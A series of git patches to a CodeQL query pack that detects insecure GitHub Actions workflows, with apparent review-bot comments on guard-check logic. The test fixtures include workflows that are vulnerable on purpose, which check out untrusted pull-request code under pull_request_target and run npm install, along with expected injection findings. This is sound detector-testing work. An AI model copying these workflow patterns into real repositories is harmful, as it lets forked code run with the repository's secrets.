@@ -1,6 +1,13 @@ edges +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index 99ebb1edc05..393dde04f35 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected 
@@ -1,5 +1,14 @@ edges +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. 
| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | From 4edfdb4101ea98948304f253c981e3a4bc4ed8bb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 28 Sep 2024 23:59:23 +0200 Subject: [PATCH 0550/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 6f57c4554d0..00d8e21c05d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.58 +version: 0.1.59 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d3b65425c41..94468d4b96c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.58 +version: 0.1.59 groups: [actions, queries] suites: codeql-suites extractor: javascript From c10d5a113e9ce3d0535335512b025bbf368fa604 Mon Sep 17 00:00:00 2001 From: Rasmus Wriedt Larsen Date: Mon, 30 Sep 2024 15:13:32 +0200 Subject: [PATCH 0551/1267] Rename help-file to match .ql file Reported by running ``` codeql generate query-help --format sarifv2.1.0 --output help.sairf ql/src/codeql-suites/actions-code-scanning.qls ``` --- ...stedCheckoutTOCTOUMedium.md => UntrustedCheckoutTOCTOUHigh.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename ql/src/Security/CWE-367/{UntrustedCheckoutTOCTOUMedium.md => UntrustedCheckoutTOCTOUHigh.md} (100%) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md similarity index 100% rename from ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md rename to ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md From e0a2eb93d6ce3ccb2680412a7dc27fcefb2aacdb Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 30 Sep 2024 15:27:15 +0200 Subject: [PATCH 0552/1267] fix: Repository checks do not protect workflow_run triggered jobs --- .../codeql/actions/security/ControlChecks.qll | 31 +++++++++-- .../CWE-077/.github/workflows/test11.yml | 55 +------------------ .../CWE-077/EnvVarInjectionCritical.expected | 12 ++-- .../CWE-077/EnvVarInjectionMedium.expected | 11 +--- .../.github/workflows/untrusted_checkout2.yml | 2 +- .../workflows/untrusted_checkout_5.yml | 23 ++++++++ .../workflows/untrusted_checkout_6.yml | 23 ++++++++ .../workflow_run_untrusted_checkout_2.yml | 19 +++++++ .../workflow_run_untrusted_checkout_3.yml | 19 +++++++ .../UntrustedCheckoutCritical.expected | 8 +++ .../CWE-829/UntrustedCheckoutHigh.expected | 2 + 11 files changed, 128 insertions(+), 77 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index b9410f0fcb0..134ce780eee 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
@@ -99,9 +99,6 @@ abstract class RepositoryCheck extends ControlCheck { // for pull_requests, that means that it triggers only on local branches or repos from the same org // - they are effective against pull requests/workflow_run since they can control where the code is coming from // - they are not effective against issue_comment since the repository will always be the same - override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() - } } abstract class PermissionCheck extends ControlCheck { @@ -173,9 +170,9 @@ class ActorIfCheck extends ActorCheck instanceof If { } } -class RepositoryIfCheck extends RepositoryCheck instanceof If { - RepositoryIfCheck() { - // eg: github.repository == 'test/foo' +class PullRequestTargetRepositoryIfCheck extends RepositoryCheck instanceof If { + PullRequestTargetRepositoryIfCheck() { + // eg: github.event.pull_request.head.repo.full_name == github.repository exists( normalizeExpr(this.getCondition()) // github.repository in a workflow_run event triggered by a pull request is the base repository 
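Review bot: The retained comment `// github.repository in a workflow_run event triggered by a pull request is the base repository` now sits inside `PullRequestTargetRepositoryIfCheck`, which after this commit protects only `pull_request_target`, so it describes the wrong event for this class. I would reword it here to something like `// github.repository in a pull_request_target event is the base repository` and keep the workflow_run wording only in the new `WorkflowRunRepositoryIfCheck`. The new example comment shows a `head.repo.full_name == github.repository` comparison, but the pattern list that decides what matches lies between this hunk and the next and is not visible. If bare `github.repository == '…'` conditions are still matched, the comment should say so. The characteristic predicate's body continues outside the hunk.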
@@ -188,6 +185,28 @@ class RepositoryIfCheck extends RepositoryCheck instanceof If { ], _, _) ) } + + override predicate protectsCategoryAndEvent(string category, string event) { + event = "pull_request_target" and category = any_relevant_category() + } +} + +class WorkflowRunRepositoryIfCheck extends RepositoryCheck instanceof If { + WorkflowRunRepositoryIfCheck() { + // eg: github.event.workflow_run.head_repository.full_name == github.repository + exists( + normalizeExpr(this.getCondition()) + // github.repository in a workflow_run event triggered by a pull request is the base repository + .regexpFind([ + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.full_name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.owner\\.name\\b" + ], _, _) + ) + } + + override predicate protectsCategoryAndEvent(string category, string event) { + event = "workflow_run" and category = any_relevant_category() + } } class AssociationIfCheck extends AssociationCheck instanceof If { diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml index 2c2480f5353..5edd526d820 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml 
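Review bot: `WorkflowRunRepositoryIfCheck` treats any `if:` condition that merely mentions `github.event.workflow_run.head_repository.full_name` (or `.owner.name`) as a protecting check, because `regexpFind(..., _, _)` tests only for the presence of the property, not for how it is compared. A condition that uses `!=`, or that ORs the comparison with another clause, would then count as a control and could suppress a real alert. Unless `normalizeExpr` (not visible here) already handles this, the pattern should require an equality against `github.repository` / `github.repository_owner`, or the limitation should be documented on the class. It may also be worth adding `"\\bgithub\\.event\\.workflow_run\\.head_repository\\.owner\\.login\\b"` to the list, since `owner.login` is the field workflows commonly compare; I have not confirmed that `owner.name` is populated in the workflow_run payload. The same presence-only matching appears to apply to `PullRequestTargetRepositoryIfCheck`, whose pattern list starts outside this hunk.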
@@ -8,37 +8,11 @@ on: jobs: comment: - if: ${{ github.repository_owner == 'cloudflare' }} + if: ${{ github.repository_owner == 'foo' }} runs-on: ubuntu-latest name: Write comment to the PR steps: - - name: "Put PR and workflow ID on the environment" - uses: actions/github-script@v7 - with: - script: | - // Copied from .github/extract-pr-and-workflow-id.js - const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ - owner: context.repo.owner, - repo: context.repo.repo, - run_id: context.payload.workflow_run.id, - }); - - for (const artifact of allArtifacts.data.artifacts) { - // Extract the PR number from the artifact name - const match = /^npm-package-(.+)-(\d+)$/.exec(artifact.name); - if (match) { - const packageName = match[1].toUpperCase(); - require("fs").appendFileSync( - process.env.GITHUB_ENV, - `\nWORKFLOW_RUN_PR_FOR_${packageName}=${match[2]}` + - `\nWORKFLOW_RUN_ID_FOR_${packageName}=${context.payload.workflow_run.id}` - ); - } - } - - name: "Download runtime versions" - # Regular `actions/download-artifact` doesn't support downloading - # artifacts from another workflow uses: dawidd6/action-download-artifact@v2 with: run_id: ${{ github.event.workflow_run.id }} @@ -52,30 +26,3 @@ jobs: cat runtime-versions.md echo EOF } >> "$GITHUB_ENV" - - - name: "Download pre-release report" - uses: dawidd6/action-download-artifact@v2 - with: - run_id: ${{ github.event.workflow_run.id }} - name: prerelease-report.md - - - name: "Put pre-release report on the environment" - id: prerelease_report - run: | - { - echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" - - - name: "Comment on PR with Wrangler link" - uses: marocchino/sticky-pull-request-comment@v2 - with: - number: ${{ env.WORKFLOW_RUN_PR_FOR_WRANGLER }} - message: | - ${{ env.PRERELEASE_REPORT }} - - --- - - ${{ env.RUNTIME_VERSIONS }} - 
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index cbd17161942..6ad5cf04304 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -20,10 +20,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | 
provenance | | @@ -69,10 +66,8 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | 
@@ -100,6 +95,7 @@ subpaths | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index e780af4107d..82602ee8ed8 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -20,10 +20,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | 
provenance | | @@ -69,10 +66,8 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml index d9e5d6be670..47a0dfc6bd3 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -6,7 +6,7 @@ jobs: steps: - name: Get PR number id: pr_number - if: ${{ github.event_name == 'issue_comment'}} + if: github.event_name == 'issue_comment' && github.repository_owner == 'foo' run: | PR_URL="${{ github.event.issue.pull_request.url }}" PR_NUMBER=${PR_URL##*/} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml new file mode 100644 index 00000000000..b98d7654998 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml @@ -0,0 +1,23 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + if: github.repository_owner == 'foo' + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml new file mode 100644 index 00000000000..037a0eb79f9 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml 
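Review bot: The new fixture `untrusted_checkout_5.yml` carries no comment saying whether its job-level `if: github.repository_owner == 'foo'` is meant to count as a guard, and the expected-output hunks visible in this commit add only `edges` rows for it, with no `#select` row in the Critical or High results. Under `pull_request_target` that expression describes the repository the workflow runs in, so it evaluates the same for a pull request from a fork and presumably should not suppress the alert, unlike the `head.repo.full_name == github.repository` comparison in `untrusted_checkout_6.yml`. The High results added for `workflow_run_untrusted_checkout_2.yml`, which uses the same owner check, point the same way. I would add a first line such as `# expect: alert - repository_owner does not exclude pull requests from forks` and confirm that an expected file outside this excerpt lists the two checkout steps.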
